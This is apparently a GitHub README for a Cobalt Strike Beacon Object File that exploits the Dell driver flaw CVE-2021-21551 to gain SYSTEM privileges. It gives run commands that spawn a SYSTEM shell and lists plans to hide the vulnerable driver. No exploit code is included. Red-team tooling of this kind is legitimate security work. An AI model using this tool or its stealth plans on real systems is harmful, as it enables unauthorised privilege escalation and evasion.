<p align="center">
    <img src="" width="450"/>
<p align="center">
    <a href=""><img src="" /></a>
    <b>Cobalt Strike Beacon Object File foundation for kernel exploitation using CVE-2021-21551.</b>
    <sup>Built by <a href="">Tijme</a>. Credits to <a href="">Alex</a> for teaching me! Made possible by <a href="">Northwave Security</a> <img src=""/></sup>

## Description

This is a Cobalt Strike (CS) Beacon Object File (BOF) which exploits CVE-2021-21551. It only overwrites the beacon process token with the system process token. But this BOF is mostly just a good foundation for further kernel exploitation via CS.

<p align="center">
    <img src="" />

## Usage

Clone this repository first. Then review the code, compile from source and use it in Cobalt Strike.




Load the `KernelMii.cna` script using the Cobalt Strike Script Manager. Then use the command below to execute the exploit.

    $ kernel_mii

Alternatively (and for testing purposes), you can directly run the compiled executable. This will spawn a command prompt as SYSTEM.

    $ .\KernelMii.x64.exe

## Limitations

* If the vulnerable driver is not installed, you need to be local admin to install it.

## Todo

* Load the vulnerable driver from memory instead of from disk.
* Delete the vulnerable driver if it was not preinstalled.
* Make the exploit stable & compatible with multiple Windows versions.

## Issues

Issues or new features can be reported via the [issue tracker]( Please make sure your issue or feature has not yet been reported by anyone else before submitting a new one.

## License

Copyright (c) 2022 Tijme Gommers & Northwave Security. All rights reserved. View []( for the full license.